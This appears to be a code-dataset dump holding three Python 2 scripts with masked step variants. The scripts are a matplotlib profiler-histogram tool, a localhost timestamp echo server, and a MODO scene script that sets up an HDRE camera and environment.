ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)
ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)
ax.grid(True)
for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
#for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)
for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
fnamelist = list(set(filename))
clist = []
for fname in filename:
color = colors[fnamelist.index(fname)]
clist += [ color ]
width = (XL[1]-XL[0])/float(len(xval)*2)
histo = ax.bar(xval-width/2, yval, width, color=clist)
dummy_bars = []
for i, fname in enumerate(fnamelist):
dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])
ax.legend(dummy_bars, fnamelist, loc=2)
#plt.savefig("./dgomp.png")
plt.show()
# ---------------------------------------------------------------------------
# Top-level analysis: contrast per-source-line sample frequencies between the
# "high" (peak) and "low" (non-peak) regions of the chosen hardware event.
# NOTE(review): Python 2 code (has_key/iteritems); must run under Python 2.
# ---------------------------------------------------------------------------
peak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
peak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
# Normalisation base: total of the per-line 'Average' columns of both peaks.
peaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])
#print 'peaks_avgsum = ', peaks_avgsum
# Accumulate per-source-line averages from both peak regions, keyed by the
# 'Head' label (the source-line description string).
peaks_normavg = {}
for i, line in enumerate(peak1['Head']):
    if peaks_normavg.has_key(line):
        peaks_normavg[line] += peak1['Average'][i]
    else:
        peaks_normavg[line] = peak1['Average'][i]
for i, line in enumerate(peak2['Head']):
    if peaks_normavg.has_key(line):
        peaks_normavg[line] += peak2['Average'][i]
    else:
        peaks_normavg[line] = peak2['Average'][i]
#print 'peaks_normavg before = ', peaks_normavg.values()[:30]
# Normalise so the peak frequencies sum to 1.0.
for line in peaks_normavg.keys():
    peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum
#print 'peaks_normavg after = ', peaks_normavg.values()[:30]
# Same accumulation and normalisation for the two "low" (non-peak) regions.
nonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
nonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
nonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])
nonpeaks_normavg = {}
for i, line in enumerate(nonpeak1['Head']):
    if nonpeaks_normavg.has_key(line):
        nonpeaks_normavg[line] += nonpeak1['Average'][i]
    else:
        nonpeaks_normavg[line] = nonpeak1['Average'][i]
for i, line in enumerate(nonpeak2['Head']):
    if nonpeaks_normavg.has_key(line):
        nonpeaks_normavg[line] += nonpeak2['Average'][i]
    else:
        nonpeaks_normavg[line] = nonpeak2['Average'][i]
#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]
for line in nonpeaks_normavg.keys():
    nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum
#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]
#import pdb; pdb.set_trace()
# result[line] = peak frequency - non-peak frequency; a positive value means
# the source line is sampled relatively more often inside the peaks.
result = {}
for line, bursts in peaks_normavg.iteritems():
    result[line] = bursts
for line, bursts in nonpeaks_normavg.iteritems():
    if result.has_key(line):
        result[line] -= bursts
    else:
        result[line] = -1.0*bursts
# Keep only lines whose peak-vs-nonpeak difference exceeds the threshold and
# parse "<lineno> (<location>)" out of the head label.
xlinenum = []
ybursts = []
filename = []
for line, bursts in result.iteritems():
    if bursts>FREQ_THRESHOLD:
        match = re.search(r'\s*(\d+)\s+\((.*)\)', line)
        if match:
            xlinenum += [ match.group(1) ]
            ybursts += [ float(bursts) ]
            # Extract the source file name (e.g. "foo.c," / "bar.F90,") from
            # the location text; fall back to 'Unresolved' when absent.
            matchfname = re.search(r'(\b\w+\.[cFf][\d]*\,)', match.group(2))
            if matchfname is None:
                fname = 'Unresolved'
            else:
                fname = matchfname.group(1)[:-1]
            filename += [ fname ]
# Sort the three parallel lists together by line number.
# NOTE(review): xlinenum holds *strings*, so this sort is lexicographic
# ('10' < '9') - confirm that ordering is intended.
zipped = zip(xlinenum, ybursts, filename)
zipped.sort()
xlinenum, ybursts, filename = zip(*zipped)
#title = 'Frequent source lines in a region of interest'
title = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)
xlabel = 'Sampled function line number'
ylabel = 'Normalized frequency'
draw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)
|
normal
|
{
"blob_id": "872b13a93c9aba55c143ee9891543f059c070a36",
"index": 4631,
"step-1": "# dg_kernel plots\n\nimport os\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport csv\nimport sys\n\nNE_SIZE = 128\nTITLE_SIZE = 35 \nTEXT_SIZE = 30 \nMARKER_SIZE = 10\nLINE_WIDTH = 5\ncolors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }\n\neventname = 'L1_DCM'\ncallstacklevel = 7\n\nFREQ_THRESHOLD = 0.02\n\nROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'\n\n# read histogram file\ndef read_histogram(histofile):\n histodict = {}\n with open(histofile, 'rb') as f:\n reader = csv.reader(f, delimiter='\\t')\n try:\n exclude_item = []\n for i, row in enumerate(reader):\n if len(row)<1: continue\n if i==0:\n name = []\n for j, item in enumerate(row[1:]):\n if len(item)<1:\n exclude_item += [ j ]\n continue\n name += [ item ]\n histodict['Head'] = name\n else:\n numval = []\n for j, item in enumerate(row[1:]):\n if j in exclude_item: continue\n try:\n numval += [ float(item) ]\n except Exception as e:\n if len(item)<1:\n numval += [ 0.0 ]\n else:\n print e\n histodict[row[0]] = numval\n except csv.Error as e:\n sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))\n\n return histodict\n\ndef draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.set_title(title, fontsize=TITLE_SIZE)\n ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)\n ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)\n\n if xrange: XL = xrange\n else: XL = [0, len(xname)]\n\n ax.set_xticks(range(len(xname)))\n newname = []\n for i, xn in enumerate(xname):\n if i%1==0:\n newname += [ xn ]\n else:\n newname += [ \"\" ]\n ax.set_xticklabels(newname)\n\n xval = np.arange(len(xname))[XL[0]:XL[1]] \n yval = yval[XL[0]:XL[1]] \n\n YL = [0, max(yval)*1.5]\n ax.axis(XL + YL)\n\n gridlines = ax.get_xaxis().get_gridlines()\n for gl in gridlines:\n gl.set_visible(False)\n\n ax.grid(b=True, 
which='major', color='b', linestyle='-', linewidth=0.5)\n ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)\n ax.grid(True)\n\n for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n #for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)\n for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n\n fnamelist = list(set(filename))\n clist = []\n for fname in filename:\n color = colors[fnamelist.index(fname)]\n clist += [ color ]\n\n width = (XL[1]-XL[0])/float(len(xval)*2)\n histo = ax.bar(xval-width/2, yval, width, color=clist)\n\n dummy_bars = []\n for i, fname in enumerate(fnamelist):\n dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])\n\n ax.legend(dummy_bars, fnamelist, loc=2)\n #plt.savefig(\"./dgomp.png\")\n plt.show() \n\npeak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\npeak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\npeaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])\n#print 'peaks_avgsum = ', peaks_avgsum\n\npeaks_normavg = {}\n\nfor i, line in enumerate(peak1['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak1['Average'][i]\n else:\n peaks_normavg[line] = peak1['Average'][i]\nfor i, line in enumerate(peak2['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak2['Average'][i]\n else:\n peaks_normavg[line] = peak2['Average'][i]\n\n#print 'peaks_normavg before = ', peaks_normavg.values()[:30]\nfor line in peaks_normavg.keys():\n peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum\n#print 'peaks_normavg after = ', peaks_normavg.values()[:30]\n\n\nnonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\nnonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\nnonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])\n\nnonpeaks_normavg = 
{}\n\nfor i, line in enumerate(nonpeak1['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak1['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak1['Average'][i]\nfor i, line in enumerate(nonpeak2['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak2['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak2['Average'][i]\n\n#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]\nfor line in nonpeaks_normavg.keys():\n nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum\n#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]\n\n#import pdb; pdb.set_trace()\n\nresult = {}\nfor line, bursts in peaks_normavg.iteritems():\n result[line] = bursts\nfor line, bursts in nonpeaks_normavg.iteritems():\n if result.has_key(line):\n result[line] -= bursts\n else:\n result[line] = -1.0*bursts\n\nxlinenum = []\nybursts = []\nfilename = []\nfor line, bursts in result.iteritems():\n if bursts>FREQ_THRESHOLD:\n match = re.search(r'\\s*(\\d+)\\s+\\((.*)\\)', line)\n if match:\n xlinenum += [ match.group(1) ]\n ybursts += [ float(bursts) ]\n matchfname = re.search(r'(\\b\\w+\\.[cFf][\\d]*\\,)', match.group(2))\n if matchfname is None: \n fname = 'Unresolved'\n else:\n fname = matchfname.group(1)[:-1]\n filename += [ fname ]\n \nzipped = zip(xlinenum, ybursts, filename)\nzipped.sort()\nxlinenum, ybursts, filename = zip(*zipped)\n#title = 'Frequent source lines in a region of interest' \ntitle = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)\nxlabel = 'Sampled function line number'\nylabel = 'Normalized frequency'\n\ndraw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
# coding:utf-8
import time
from SocketServer import (TCPServer as TCP,
StreamRequestHandler as SRH)
HOST = '127.0.0.1'   # listen on the loopback interface only
PORT = 8888          # arbitrary non-privileged port
BUFSIZE = 1024       # NOTE(review): defined but never used in this script
ADDR = (HOST, PORT)  # (host, port) pair passed to TCPServer
class MyRequestHandler(SRH):
def handle(self):
print '...connected from :', self.client_address
self.wfile.write('[%s] %s' % (time.ctime(),
self.rfile.readline()))
# Bind the handler class to the address and serve requests until interrupted.
tcpServ = TCP(ADDR, MyRequestHandler)
print 'waiting for connection...'
tcpServ.serve_forever( )
|
normal
|
{
"blob_id": "377143635939cf113e4188b5c4f55cec068a17b1",
"index": 4171,
"step-1": "#!/usr/bin/env python\n# coding:utf-8\nimport time\nfrom SocketServer import (TCPServer as TCP,\n StreamRequestHandler as SRH)\n\nHOST = '127.0.0.1'\nPORT = 8888\nBUFSIZE = 1024\nADDR = (HOST, PORT)\n\nclass MyRequestHandler(SRH):\n def handle(self):\n print '...connected from :', self.client_address\n self.wfile.write('[%s] %s' % (time.ctime(), \n self.rfile.readline()))\n \ntcpServ = TCP(ADDR, MyRequestHandler)\nprint 'waiting for connection...'\ntcpServ.serve_forever( )",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
################################################################################
#
# HDREEnable.py
#
# Version: 1.000
#
# Author: Gwynne Reddick
#
# Description:
#
#
# Usage:
#
# Last Update 16:49 08/12/10
#
################################################################################
# part of a hack for later on so we can identify if a second HDRE assembly has been applied
# Maps each possible duplicate-camera name to the suffix that was appended,
# so renamenew() can strip that suffix from every renamed HDRE item.
camnames = {'HDRECam (2)':' (2)',
            'HDRECam(2)':'(2)',
            'HDRECam 2':' 2',
            'HDRECam_2':'_2',
            'HDRECam2':'2'}
# The three environment items that make up an HDRE assembly.
HDREEnvs = ['HDRERefl', 'HDREBackplate', 'HDREEnv']
def itemexists(name):
    """Return True when an item called *name* exists in the current scene.

    Attempts to select the item, then checks whether the selection actually
    contains *name* (selecting a missing item leaves it out of the result).
    """
    lx.eval('select.item {%s} set' % name)
    return name in lx.evalN('item.name ?')
def lockcamera():
    """Put the HDRE camera into a group and lock the group's channels.

    No-op when the 'HDRECam_Grp' group already exists (idempotent).
    """
    if itemexists('HDRECam_Grp'):
        return  # already grouped and locked on a previous run
    for command in ('select.drop item',
                    'group.create',
                    'item.name HDRECam_Grp',
                    'select.subItem HDRECam set camera',
                    '!!group.edit add item',
                    'select.item HDRECam_Grp set',
                    'item.channel lock on item:HDRECam_Grp'):
        lx.eval(command)
def lockanimcamera():
    """Group the animation camera's position channels and lock the group.

    No-op when the 'HDRECamAnimate_Grp' group already exists (idempotent).
    """
    if itemexists('HDRECamAnimate_Grp'):
        return  # already locked on a previous run
    lx.eval('select.drop item')
    lx.eval('group.create')
    lx.eval('item.name HDRECamAnimate_Grp')
    # Find the animate camera's position transform and add its X/Y/Z
    # channels to the newly created group.
    xfrm = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')
    for channel_cmd in ('select.channel {%s:pos.X} set',
                        'select.channel {%s:pos.Y} add',
                        'select.channel {%s:pos.Z} add'):
        lx.eval(channel_cmd % xfrm)
    lx.eval('!!group.edit add chan')
    lx.eval('item.channel lock on item:HDRECamAnimate_Grp')
def hastag(item):
    """Return True if *item* carries the 'HDRE' marker tag.

    Selects *item* and queries its 'HDRE' string tag; returns True when the
    tag value is 'set'.  Otherwise the function falls through and returns
    None (falsy), preserving the original truth-test behaviour.
    """
    lx.eval('select.drop item')
    lx.eval('select.item {%s} set' % item)
    if lx.eval('item.tag HDRE ?') == 'set':
        # Bug fix: the original returned `true`, which is not defined in
        # Python (the boolean literal is `True`) and raised a NameError.
        return True
def clearold():
    """Remove every previously applied HDRE assembly from the scene.

    Deletes HDRE-tagged environment items, the (single) HDRE-tagged group
    locator, the old ground/water material group, and finally the image
    clips the deleted environments referenced.  Any error is logged via
    lx.out() and aborts the remaining cleanup.
    """
    try:
        numenvs = lx.eval('query sceneservice environment.N ? all')
        envs = []
        oldclips = []
        for x in xrange(numenvs):
            envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))
        # need a hack here to work round what appears to be a bug. We need to collect a
        # list of clips to delete after deleting the env items. For some reason we have
        # to collect the list in one loop, then delete the env items in a second loop
        # otherwise querying the env refl image returns None. I think this is because the
        # env image layer is originally an instance
        for env in envs:
            lx.eval('select.item %s set' % env)
            if lx.eval('item.tag string HDRE ?') == 'set':
                layer, process = lx.eval('query sceneservice mask.children ? {%s}' % env)
                lx.eval('select.item {%s} set' % layer)
                oldclips.append(lx.eval('texture.setIMap ?'))
        # now delete the env items
        for env in envs:
            lx.eval('select.item %s set' % env)
            if lx.eval('item.tag string HDRE ?') == 'set':
                lx.eval('!!item.delete')
        # delete the first HDRE-tagged group locator, if any exists
        numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')
        grplocs = []
        for x in xrange(numgrplocs):
            grplocs.append(lx.eval('query sceneservice groupLocator.ID ? %s' % x))
        for loc in grplocs:
            lx.eval('select.item %s set' % loc)
            if lx.eval('item.tag string HDRE ?') == 'set':
                lx.eval('!!item.delete')
                break
        # clear old ground and water material groups
        lx.eval('select.itemPattern HDREGroup')
        id = lx.eval1('query sceneservice selection ? mask')
        parent = lx.eval('query sceneservice mask.parent ? %s' % id)
        lx.eval('select.item %s set' % parent)
        lx.eval('texture.delete')
        # clear old clips
        for clip in oldclips:
            lx.eval('select.drop item')
            lx.eval('select.item {%s} set' % clip)
            lx.eval('clip.delete')
    except:
        lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
def renamenew(incr):
    """Strip the duplicate-name suffix *incr* from every HDRE item.

    After a second HDRE assembly is imported, MODO appends a suffix (e.g.
    ' (2)') to every item name; this renames each known item back to its
    canonical name and then fixes the parent group locator the same way.
    Errors are logged via lx.out().
    """
    try:
        for template in ('item.name HDRECam item:{HDRECam%s}',
                         'item.name HDRECamAnimate item:{HDRECamAnimate%s}',
                         'item.name HDRESun item:{HDRESun%s}',
                         'item.name HDRERefl item:{HDRERefl%s}',
                         'item.name HDREBackplate item:{HDREBackplate%s}',
                         'item.name HDREEnv item:{HDREEnv%s}',
                         'item.name {HDREActivate} item:{HDREActivate%s}',
                         'item.name {HDREWater} item:{HDREWater%s}',
                         'item.name {HDREShadowGround} item:{HDREShadowGround%s}',
                         'item.name {HDREControls} item:{HDREControls%s}',
                         'item.name {BackdropBrowser} item:{BackdropBrowser%s}',
                         'item.name {Texture Group} item:{Texture Group%s}',
                         'item.name {HDREGroup} item:{HDREGroup%s}'):
            lx.eval(template % incr)
        # rename the parent group: drop the suffix from the root locator too
        parent_id = lx.eval('query sceneservice item.parent ? HDRECam')
        old_name = lx.eval('query sceneservice item.name ? %s' % parent_id)
        trimmed = old_name.split(incr)[0]
        lx.eval('item.name {%s} item:{%s}' % (trimmed, old_name))
    except:
        lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
def tagitems():
    """Mark the HDRE environments and the root assembly with the 'HDRE' tag.

    The tag is what clearold() later uses to identify items belonging to
    this assembly.  Errors are logged via lx.out().
    """
    try:
        lx.eval('select.drop item')
        # Tag each environment item, then the root assembly locator.
        for target in HDREEnvs + [rootID]:
            lx.eval('select.item {%s} set' % target)
            lx.eval('item.tag string {HDRE} {set}')
    except:
        lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
def setframesize():
    """Match the render resolution to the backplate image's aspect ratio.

    Finds the image map under the HDREBackplate environment, reads the
    clip's pixel dimensions, and sets the render width/height so the longer
    side is 1024 pixels.  Does nothing if no backplate image map is found.
    Errors are logged via lx.out().
    """
    try:
        backplate = None
        # find the backplate
        envchildren = lx.eval('query sceneservice item.children ? HDREBackplate')
        for child in envchildren:
            if lx.eval('query sceneservice item.type ? {%s}' % child) == 'imageMap':
                lx.eval('select.item %s set' % child)
                backplate = lx.eval('texture.setIMap ?')
                break
        if backplate:
            clip_width = None
            clip_height = None
            # set render frame size and film back aspect aspect
            clips = lx.evalN('query layerservice clips ? all')
            for clip in clips:
                if lx.eval('query layerservice clip.name ? {%s}' % clip) == backplate:
                    # clip.info returns space-separated "key:value" fields;
                    # fields 1 and 2 hold the pixel width and height.
                    info = lx.eval('query layerservice clip.info ? {%s}' % clip).split()
                    clip_width = float(info[1].split(':')[1])
                    clip_height = float(info[2].split(':')[1])
            if clip_width != None and clip_height != None:
                # Longest side becomes 1024; the other side keeps the
                # clip's aspect ratio.
                if clip_width > clip_height:
                    frame_width = 1024
                    frame_height = int((clip_height/clip_width) * 1024)
                else:
                    frame_height = 1024
                    frame_width = int((clip_width/clip_height) * 1024)
                lx.eval('render.res 0 %s' % frame_width)
                lx.eval('render.res 1 %s' % frame_height)
    except:
        lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
# ---------------------------------------------------------------------------
# Main body: enable/refresh the HDRE assembly in the current scene -- clean
# out any duplicate assembly, lock the cameras, configure render settings
# and hide competing environments/lights.
# ---------------------------------------------------------------------------
try:
    # close previously open backdrop browser if there is one
    if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):
        cookie = lx.eval('user.value HDRE_Card ?')
        lx.eval('layout.createOrClose {%s} open:0' % cookie)
    # rootID (the parent of the selected locator) is read later by tagitems()
    selectedItem = lx.eval1('query sceneservice selection ? locator')
    rootID = lx.eval('query sceneservice item.parent ? %s' % selectedItem)
    # check to see if an HDRE environment already exists and clear it out if it does.
    # this is a bit of a hack, we have to test to see if one of our known items exists
    # with an incremented name. If it does we delete all HDRE items with names that
    # are not incremented and then rename all the ones that are - YUK!!!!
    numcams = lx.eval('query sceneservice camera.N ? all')
    for x in xrange(numcams):
        camname = lx.eval('query sceneservice camera.name ? %s' % x)
        if camname in camnames.keys():
            incr = camnames[camname]
            clearold()
            renamenew(incr)
            break
    if itemexists('HDRECam'):
        # set animate camera focal length
        if itemexists('HDRECamAnimate'):
            # focalLen is in metres; *1000 converts to millimetres, then the
            # value is bumped into the next standard lens bracket.
            flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3) * 1000
            if flength >= 101 and flength <= 200:
                flength = flength + 100
            elif flength >= 51 and flength <= 100:
                flength = flength + 50
            elif flength >= 18 and flength <= 50:
                flength = flength + 10
            lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' % flength)
            lx.eval('render.camera HDRECamAnimate')
            lockanimcamera()
        lx.eval('render.camera HDRECam')
        # group and lock the camera
        lockcamera()
    # enable global illumination and set displacement rate/ratio
    renID = lx.eval('query sceneservice polyRender.ID ? 0')
    lx.eval('item.channel globEnable true item:%s' % renID)
    lx.eval('item.channel dispRate 3 item:%s' % renID)
    lx.eval('item.channel dispRatio 8 item:%s' % renID)
    # set the scene gamma
    numouts = lx.eval('query sceneservice renderOutput.N ? all')
    for x in xrange(numouts):
        id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)
        lx.eval('select.item %s set' % id)
        if lx.eval('shader.setEffect ?') == 'shade.color':
            lx.eval('item.channel gamma 2.2 item:%s' % id)
    # hide every environment that is not part of the HDRE assembly
    num_envs = lx.eval('query sceneservice environment.N ? all')
    environments = []
    for x in xrange(num_envs):
        environments.append(lx.eval('query sceneservice environment.name ? %s' % x))
    for env in environments:
        if env not in HDREEnvs:
            lx.eval('item.channel visCam false item:{%s}' % env)
            lx.eval('item.channel visInd false item:{%s}' % env)
            lx.eval('item.channel visRefl false item:{%s}' % env)
            lx.eval('item.channel visRefr false item:{%s}' % env)
    # hide every light except the HDRE sun
    numlights = lx.eval('query sceneservice light.N ? all')
    for x in xrange(numlights):
        if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':
            id = lx.eval('query sceneservice light.ID ? %s' % x)
            lx.eval('layer.setVisibility {%s} 0' % id)
    if itemexists('HDREActivate'):
        lx.eval('layer.setVisibility {HDREActivate} 0')
    controlsID = lx.eval('query sceneservice item.ID ? HDREControls')
    if controlsID:
        lx.eval('layer.setVisibility {%s} 1' % controlsID)
    # set render frame size
    setframesize()
    tagitems()
except:
    lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
|
normal
|
{
"blob_id": "78a96020abfd393438c2fce1dfd5fd159a23ca5a",
"index": 9666,
"step-1": "<mask token>\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\n<mask token>\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? 
%s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\n<mask token>\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? 
all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\n<mask token>\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? 
